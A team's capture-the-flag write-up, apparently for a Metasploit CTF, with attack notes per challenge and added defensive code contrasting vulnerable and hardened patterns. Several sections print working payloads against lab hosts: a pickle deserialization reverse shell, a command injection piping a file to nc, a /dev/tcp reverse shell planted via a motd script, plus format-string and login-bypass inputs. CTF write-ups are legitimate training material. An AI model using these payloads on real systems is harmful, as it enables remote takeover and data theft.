[toc]
# Flags
## 4 of Hearts - 80:

## 8 of Hearts - 4545:

ELF file:

With enough `buffalo` (a pun on "buffer") it decrypts the .enc file.
Reversing the ELF shows that it "encrypts" by XOR-ing with 0x41. (Ask Deso for more details.)
I tried it with https://github.com/mstrand/xcat:
```
xcat.py -n 0x41 8_of_hearts.enc > asd.png
```
and it works:

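The same single-byte XOR undone in plain Python, as an added example that is not part of the writeup or of xcat. It assumes the key 0x41 the writeup recovered from the binary, and goes one step further: because the output is a PNG, the known 8-byte PNG signature leaks a single-byte XOR key even when the key is unknown, so the decoder can check it is producing a real image rather than junk.

```python
"""Undo a single-byte XOR 'encryption' and verify the result is a PNG.

Added example (not the challenge's code). The key 0x41 comes from the
writeup; the sample ciphertext is constructed inline.
"""
from typing import Optional

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
KEY = 0x41  # key recovered by reversing the ELF, per the writeup


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the same key; XOR is its own inverse."""
    return bytes(b ^ key for b in data)


def looks_like_png(data: bytes) -> bool:
    return data.startswith(PNG_MAGIC)


def recover_single_byte_key(data: bytes, magic: bytes = PNG_MAGIC) -> Optional[int]:
    """Known-plaintext attack on a single-byte XOR: the first ciphertext byte
    XOR the first expected plaintext byte is the key; the remaining magic
    bytes confirm it. Returns None if the header does not line up."""
    if len(data) < len(magic):
        return None
    key = data[0] ^ magic[0]
    return key if xor_bytes(data[: len(magic)], key) == magic else None


def decrypt_bytes(enc: bytes, key: int = KEY) -> bytes:
    """Decrypt and refuse to return data that is not a PNG (wrong key)."""
    out = xor_bytes(enc, key)
    if not looks_like_png(out):
        raise ValueError(f"key {key:#x} does not yield a PNG header")
    return out


def decrypt_file(src: str, dst: str, key: int = KEY) -> int:
    """Decrypt src into dst; returns the number of bytes written."""
    with open(src, "rb") as fh:
        out = decrypt_bytes(fh.read(), key)
    with open(dst, "wb") as fh:
        fh.write(out)
    return len(out)


if __name__ == "__main__":
    # Constructed sample: a fake PNG XOR-ed with 0x41, no file needed.
    sample_enc = xor_bytes(PNG_MAGIC + b"constructed body", KEY)
    print("recovered key:", hex(recover_single_byte_key(sample_enc)))
    print("decrypts to PNG:", looks_like_png(decrypt_bytes(sample_enc)))
```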
## 3 of Spades - 8080 :

When you use `guest` with any password, the response comes back after 5 seconds.
With other random names it returns immediately. So: `observational skills` :)
Since my Burp (Community Edition) was slow, I brute-forced it with:
https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack
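The defect behind this challenge is a login routine that does its expensive work only for accounts that exist, so the response time confirms a username before the password is ever checked. The following is an added example, not the challenge's code: the challenge used a fixed 5-second delay, whereas here the cost is a constructed PBKDF2 password hash, and the hardened variant hashes against a dummy value for unknown users so both paths do identical work and the comparison is constant-time.

```python
"""Username enumeration through timing: leaky vs. uniform-work login.

Added example; the user database, salt and hash cost are constructed.
"""
import hashlib
import hmac

ITERATIONS = 50_000
_work = {"hashes": 0}  # instrumentation so the difference is observable without a stopwatch


def _hash(password: str, salt: bytes) -> bytes:
    _work["hashes"] += 1
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


_SALT = b"constructed-salt"
USERS = {"guest": _hash("s3cret", _SALT)}  # the one real account
_DUMMY = _hash("dummy-password", _SALT)     # hashed on the unknown-user path


def login_leaky(username: str, password: str) -> bool:
    """Vulnerable: the hash only runs for existing accounts, so a
    non-existent user answers measurably faster."""
    stored = USERS.get(username)
    if stored is None:
        return False
    return _hash(password, _SALT) == stored


def login_uniform(username: str, password: str) -> bool:
    """Hardened: same work on both paths, constant-time comparison, and the
    existence check is folded in after the hash rather than before it."""
    stored = USERS.get(username, _DUMMY)
    candidate = _hash(password, _SALT)
    matched = hmac.compare_digest(candidate, stored)
    return matched and username in USERS


def hash_calls(login, username: str, password: str) -> int:
    """How many hash computations one login attempt triggered."""
    before = _work["hashes"]
    login(username, password)
    return _work["hashes"] - before


if __name__ == "__main__":
    for fn in (login_leaky, login_uniform):
        print(fn.__name__, "known user:", hash_calls(fn, "guest", "wrong"),
              "unknown user:", hash_calls(fn, "nobody", "wrong"))
```

With the leaky version the unknown-user path performs zero hashes, exactly the asymmetry the writeup exploited (there as a 5-second sleep); the uniform version performs one hash in both cases.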

## 2 of Clubs - 9001
SQLite SQLi (UNION-based) in the search field.
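As an added example (not the challenge's code), the search handler the way it must have looked beside its fixed form, against a constructed in-memory SQLite database: the vulnerable version interpolates the term into the SQL text, so a UNION appends rows from another table; the parameterized version passes the term as a bound value and the same input is just a string that matches nothing.

```python
"""UNION-based SQL injection in a search field: vulnerable vs. parameterized.

Added example with a constructed in-memory SQLite database.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE cards(name TEXT);
        INSERT INTO cards VALUES ('two of clubs'), ('ace of spades');
        CREATE TABLE secrets(flag TEXT);
        INSERT INTO secrets VALUES ('FLAG{constructed-sample}');
        """
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    # String interpolation: the term becomes part of the SQL grammar.
    sql = f"SELECT name FROM cards WHERE name LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn: sqlite3.Connection, term: str) -> list:
    # Bound parameter: the term is data, whatever characters it contains.
    sql = "SELECT name FROM cards WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{term}%",))]


# Constructed probe of the kind the writeup refers to: closes the quoted
# LIKE pattern, unions in a column from another table, comments out the rest.
UNION_PROBE = "' UNION SELECT flag FROM secrets --"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable :", search_vulnerable(db, UNION_PROBE))
    print("parameterized:", search_parameterized(db, UNION_PROBE))
```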


## Red Joker - 9007


The flag is obvious, but what about those zip files?
## Black Joker - 8123


`hashcat -m 0 pass_to_crack.txt -a 3 ihatesalt?1?1?1?1?1?1 -i --increment-min 9 --increment-max 15 -1 ?l?d --force -O`
/admin
## 6 of Hearts - 6868
```bash
curl -i -s -k -X $'GET' \
    -H $'Host: 172.15.1.117:6868' \
    $'http://172.15.1.117:6868/files/BUDDY/2'
```
## Queen of Hearts - 9008 and 9010
- decompile the Java classes with Procyon, change AuthState.java (change `loggedIn` from `private` to `public`) and set `this.authState.loggedIn` in Client.java before the authentication is sent
`AuthState.java`:
```java
import java.io.Serializable;
import java.util.Base64;

//
// Decompiled by Procyon v0.5.36
//
public class AuthState implements Serializable
{
    private static final long serialVersionUID = 123197894L;
    public boolean loggedIn;
    public String username;

    public AuthState() {
        this.loggedIn = true;
        this.username = "Guest";
    }

    public boolean isLoggedIn() {
        return true;
    }

    public void setLoggedInStatus(final boolean loggedIn) {
        this.loggedIn = true;
    }
}
```
`Client.class`:
```java
public void doAuthenticate(final BufferedReader bufferedReader) {
    try {
        this.authState.loggedIn = true;
        this.cliOut.writeObject(this.authState);
        final String utf = this.cliIn.readUTF();
        System.out.println(utf);
        if (utf.contains("already authenticated")) {
            return;
        }
        // this.cliOut.writeUTF(bufferedReader.readLine());
        this.cliOut.writeUTF(this.authState.username);
        this.cliOut.flush();
        System.out.println(this.cliIn.readUTF());
        this.authState = (AuthState)this.cliIn.readObject();
    }
    catch (IOException | ClassNotFoundException ex) {
        System.out.println("Could not retrieve server's message regarding authentication");
    }
}
```

## 7 of Spades - 8888
@QyskiSXyT0GStc7wr3DmtQ got a reverse shell through the pickle cookie serialization:
```python=
import pickle
import base64
import os
class RCE1:
def __reduce__(self):
# 1. Dump the flag from memory
dumpcmd = "with open('/tmp/flag.png', 'wb') as f: f.write(FLAG)"
return eval, (dumpcmd,)
class RCE2:
def __reduce__(self):
#2. Spawn reverse shell
cmd = """
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.15.1.116",44444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
"""
return os.system, (cmd,)
dump_flag = pickle.dumps(RCE1())
rev_shell = pickle.dumps(RCE2())
print('The vuln is in the cookie serilization, here are the malicious payloads')
print('1. dump flag from memory:')
print(base64.b64encode(dump_flag))
print('2. start a rev shell on the KaliBox p=44444')
print('3. rev shel payload:')
print(base64.b64encode(rev_shell))
```
We saw the following in the web app's code:
```python
with (app_path / 'modules_metadata_base.json').open('r') as file_h:
msf_modules = json.load(file_h)
for module in msf_modules.values():
module['platforms'] = tuple(platform.strip() for platform in set(module['platform'].split(',')))
with (app_path / 'flag.png').open('rb') as file_h:
FLAG = file_h.read()
if not config.DEBUG:
(app_path / 'flag.png').unlink()
```
We saw that flag.png had already been deleted...
@QyskiSXyT0GStc7wr3DmtQ realised it could be dumped from memory back into a file:
```python
class RCE1:
def __reduce__(self):
# 1. Dump the flag from memory
dumpcmd = "with open('/tmp/flag.png', 'wb') as f: f.write(FLAG)"
return eval, (dumpcmd,)
```
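Both this challenge and the Queen of Hearts one fail the same way: the server rebuilds its notion of "who is logged in" from bytes the client supplies, with `pickle` the rebuild step can also call arbitrary callables via `__reduce__`. The following is an added example, not the app's code: an `Unpickler` that refuses every global lookup (so a stream carrying a `__reduce__` callable fails instead of running), and the replacement a cookie should use anyway, HMAC-signed JSON, so the client can read its session state but cannot forge a `loggedIn: true`. The `Marker` class and the secret are constructed; `Marker` uses the benign `os.getcwd` to show the mechanism.

```python
"""Deserializing client-supplied state safely.

Added example (not the challenge app's code). Marker, SECRET and the
session claims are constructed for the demonstration.
"""
import hashlib
import hmac
import io
import json
import os
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global lookup: the stream can rebuild plain data
    (dicts, lists, strings, numbers) but never resolve a callable."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Marker:
    """Constructed stand-in for a hostile object: on a normal pickle.loads
    its __reduce__ makes the loader call os.getcwd() (harmless here, but
    the same hook the writeup's payloads use with eval/os.system)."""

    def __reduce__(self):
        return (os.getcwd, ())


SECRET = b"constructed-server-side-secret"  # never sent to the client


def issue_session(claims: dict, secret: bytes = SECRET) -> str:
    """Cookie = hex(JSON body) + '.' + HMAC-SHA256(body). Readable, not forgeable."""
    body = json.dumps(claims, separators=(",", ":"), sort_keys=True).encode()
    tag = hmac.new(secret, body, hashlib.sha256).hexdigest()
    return body.hex() + "." + tag


def load_session(cookie: str, secret: bytes = SECRET):
    """Return the claims only if the tag verifies; None for anything else."""
    try:
        body_hex, tag = cookie.split(".", 1)
        body = bytes.fromhex(body_hex)
    except ValueError:
        return None
    expected = hmac.new(secret, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(body)


if __name__ == "__main__":
    hostile = pickle.dumps(Marker())
    print("pickle.loads ran a callable ->", pickle.loads(hostile))
    try:
        restricted_loads(hostile)
    except pickle.UnpicklingError as exc:
        print("restricted_loads refused ->", exc)
    cookie = issue_session({"username": "Guest", "loggedIn": False})
    print("valid cookie ->", load_session(cookie))
    forged = issue_session({"username": "Guest", "loggedIn": True}, secret=b"guess")
    print("forged cookie ->", load_session(forged))
```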

## 6 of Diamonds - 8200
@QyskiSXyT0GStc7wr3DmtQ worked magic again -> RCE through the EXIF metadata of the images:
http://blog.brian.jp/python/png/2016/07/07/file-fun-with-pyhon.html
## Queen of Spades - 8202

GraphQL Introspection:
```
POST /api HTTP/1.1
Host: 172.15.1.117:8202
Content-Length: 1552
Pragma: no-cache
Cache-Control: no-cache
accept: */*
authorization:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
content-type: application/json
Origin: http://172.15.1.117:8202
Referer: http://172.15.1.117:8202/posts
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SESSION=gAR9lC4=
Connection: close
{"query":"query CURRENT_USER_QUERY {__schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } }"
}
```
https://apis.guru/graphql-voyager/

- Request:
```
{
"query":"query CURRENT_USER_QUERY {posts{media,title,content}}"
}
```
- Response:
```
{"data":{"posts":[{"media":"/cac0babe-1fff-4d85-9070-8d147e76da4b/queen_of_spades.png","title":"Lorem ipsum dolor sit amet","content":"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec interdum ut metus consectetur sodales. Sed et vulputate massa. Nullam consequat fringilla ante, sit amet lacinia ligula egestas et. Mauris imperdiet sodales nisl, sit amet placerat nisi. Pellentesque et ligula at purus convallis vehicula. Aenean ac ullamcorper diam"}]}}
```

## 9 of Clubs - 1337
```
Trying 172.15.1.117...
Connected to 172.15.1.117.
Escape character is '^]'.
Welcome to the '9 of Clubs' service.
-------------------------------
Please choose an option:
1. Send contact info
2. Greetings
3. Send feedback
0. Exit
2
Please, enter your name...
%9$s
Hello Flag_9_of_Clubs{b17ef17454081e89c084d5182d76c527}!!!
```
## 5 of Clubs - 8101
https://hackmd.io/HMeKG6ACROirmj_xFFm75Q
## 2 of Hearts - 9000
```
POST / HTTP/1.1
Host: 172.15.1.117:9000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.15.1.117:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.15.1.117:9000/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
search=$(cat+hidden/2_of_hearts.png+|+base64+|+nc+172.15.1.116+44444)
```
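The request above works because the `search` value is spliced into a shell command line, so `$(...)` is expanded by the shell before the intended program ever runs. As an added example (not the challenge's code) the pattern beside its two fixes: build an argv list and skip the shell entirely, or, when a shell is unavoidable, quote every argument with `shlex.quote`. The vulnerable command string is only built, never executed; the safe variants use the interpreter itself as the child process so the example runs anywhere Python does.

```python
"""Command injection via a search field: interpolated string vs. argv list.

Added example. The probe term is constructed; the vulnerable command is
returned as a string and deliberately never run.
"""
import shlex
import subprocess
import sys

# Child that echoes its first argument byte-for-byte; used instead of a
# real search tool so the demonstration is self-contained.
_ECHO_ARGV = "import sys; sys.stdout.write(sys.argv[1])"
METACHARS = "$`;|&<>()"


def build_command_unsafe(term: str) -> str:
    """Vulnerable pattern: the term lands inside the shell's grammar.
    Under /bin/sh a term such as $(id) would run id before grep starts."""
    return f"grep -ril {term} hidden/"


def shell_metachars(term: str) -> list:
    """Characters in the term that a POSIX shell would interpret."""
    return [ch for ch in METACHARS if ch in term]


def echo_safe(term: str) -> str:
    """Hardened: argv list, no shell; the term reaches the child verbatim."""
    out = subprocess.run([sys.executable, "-c", _ECHO_ARGV, term],
                         capture_output=True, check=True)
    return out.stdout.decode()


def echo_quoted(term: str) -> str:
    """If a shell really is required, quote each argument so the shell
    treats it as one literal word."""
    cmd = " ".join(shlex.quote(a) for a in (sys.executable, "-c", _ECHO_ARGV, term))
    out = subprocess.run(cmd, shell=True, capture_output=True, check=True)
    return out.stdout.decode()


if __name__ == "__main__":
    probe = "$(id)"  # constructed: would execute `id` if passed to a shell unquoted
    print("unsafe command line :", build_command_unsafe(probe))
    print("shell metacharacters:", shell_metachars(probe))
    print("argv, no shell      :", echo_safe(probe))
    print("shell, quoted       :", echo_quoted(probe))
```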
## Ace of Clubs - 9009

- log in with `admin` and `password` over ssh
- find `/opt/vpn_connect`, which is a suid binary. When you pass it a log file path with `-l`, if the file does not exist it creates it owned by user `root` and group `admin`, with rw permissions for `admin`.
- With `pspy` you see that on ssh login it runs the scripts in `/etc/update-motd.d/`
- You create a file there, then edit it and put your revshell in it
- start a listener, connect with a new ssh session and get `root`.
- The flag is in /etc.

```bash
admin@7a16300c4aee:/opt$ ./vpn_connect -u kor -p kor -l /etc/update-motd.d/1-kor
Logging to /etc/update-motd.d/1-kor
Unknown username
admin@7a16300c4aee:/opt$ cat /etc/update-motd.d/1-kor
Attempting to connect to server with kor and kor
Connection handled
Authentication failed
admin@7a16300c4aee:/opt$ ls -la /etc/update-motd.d/1-kor
-rwxrwxr-- 1 root admin 93 Dec 6 10:09 /etc/update-motd.d/1-kor
admin@7a16300c4aee:/opt$ printf '#!/bin/bash\nbash -i >& /dev/tcp/172.15.1.116/4444 0>&1' > /etc/update-motd.d/1-kor
```
## 9 of Diamonds - 8201
```
./ffuf -u http://intranet.metasploit.ctf:8201/ -H "Host: FUZZ.intranet.metasploit.ctf" -mc 200 -w /usr/share/wordlists/dirb/common.txt
articles [Status: 200, Size: 68, Words: 10, Lines: 2]
assets [Status: 200, Size: 68, Words: 10, Lines: 2]
Articles [Status: 200, Size: 68, Words: 10, Lines: 2]
contact [Status: 200, Size: 68, Words: 10, Lines: 2]
Contact [Status: 200, Size: 68, Words: 10, Lines: 2]
hidden [Status: 200, Size: 95, Words: 8, Lines: 4] <--------------------------
Login [Status: 200, Size: 68, Words: 10, Lines: 2]
login [Status: 200, Size: 68, Words: 10, Lines: 2]
reports [Status: 200, Size: 68, Words: 10, Lines: 2]
Software [Status: 200, Size: 68, Words: 10, Lines: 2]
software [Status: 200, Size: 68, Words: 10, Lines: 2]
```
## 4 of Clubs - 8092
we send a POST request to login.php and pass password as the array ["apples", "banana"], and it comes back as true
the flag is http://127.0.0.1:8092/completedItCongrats453223232.png
```
user=admin&password[%22%61%70%70%6c%65%22%2c%2b%22%62%61%6e%61%6e%61%22]=&hash=
```
## 8 of Diamonds - 5555
```python
#!/usr/bin/env python3
from pwn import *
import sys


def find_bombs(row):
    """Yield the column index of every bomb ('0') in a board row."""
    start = 0
    while True:
        start = row.find("0", start)
        if start == -1:
            return
        yield start
        start += 1


r = remote('172.15.1.117', 5555)
line = r.readline()      # banner line
prev_bomb = []           # bomb columns seen in the previous row
current_me = 0
log = ""
while True:
    line = r.readline()
    current_line = line.decode('utf8')
    print(f"{current_line}")
    if 'SCORE' not in current_line:
        if current_line.find('X') > -1:      # we hit a bomb: report the last move and quit
            current_me = current_line.find('X')
            print(f"me @ {current_me}: , bombs: {prev_bomb}")
            print(f"last step: {log}")
            r.close()
            sys.exit()
        if current_line.find('^') > -1:      # our own position in this row
            current_me = current_line.find('^')
            # Left half of the board: dodge right unless the next column is also a bomb.
            if 1 <= current_me <= 6 and current_me in prev_bomb:
                if current_me + 1 in prev_bomb:
                    log = f"1 me @ {current_me} going left, bombs: {prev_bomb}"
                    r.sendline(b'\x5b\x44')  # Move left
                else:
                    log = f"2 me @ {current_me} going right, bombs: {prev_bomb}"
                    r.sendline(b'\x5b\x43')  # Move right
            # Right half of the board: dodge left unless the previous column is also a bomb.
            if 14 >= current_me >= 7 and current_me in prev_bomb:
                if current_me - 1 in prev_bomb:
                    log = f"3 me @ {current_me} going right, bombs: {prev_bomb}"
                    r.sendline(b'\x5b\x43')  # Move right
                else:
                    log = f"4 me @ {current_me} going left, bombs: {prev_bomb}"
                    r.sendline(b'\x5b\x44')  # Move left
        if current_line.find('0') > -1:
            # Materialise the generator: it is tested with `in` several times per row,
            # and a bare generator would be consumed by the first test.
            prev_bomb = list(find_bombs(current_line))
```
```
SCORE: 489
| 0 0 |
| 0 |
| 0 0 |
| 0 0 |
| 0 0 |
| 0|
|0 0 |
| 0 0 |
| 0 0|
| 0^ 0 |
CONGRATULATIONS! Check port 7878!
```
on port 7878 there was a web server serving the 8 of diamonds
```
kali@kali:~$ curl http://172.15.1.117:7878
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="flag.png">flag.png</a></li>
</ul>
<hr>
</body>
</html>
```
## 8 of Clubs - 1080
socks5 proxychains via 172.15.1.117:1080

And what do we have on port 8000:
`proxychains curl -i http://127.0.0.1:8000`
```html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="8_of_spades.png">8_of_spades.png</a></li>
</ul>
<hr>
</body>
</html>
```
## 9 of Hearts - UDP 53
We change /etc/resolv.conf to
`nameserver 172.15.1.117`
We try all sorts of things... then:

after that:

a base64 matryoshka from the `txt` record:
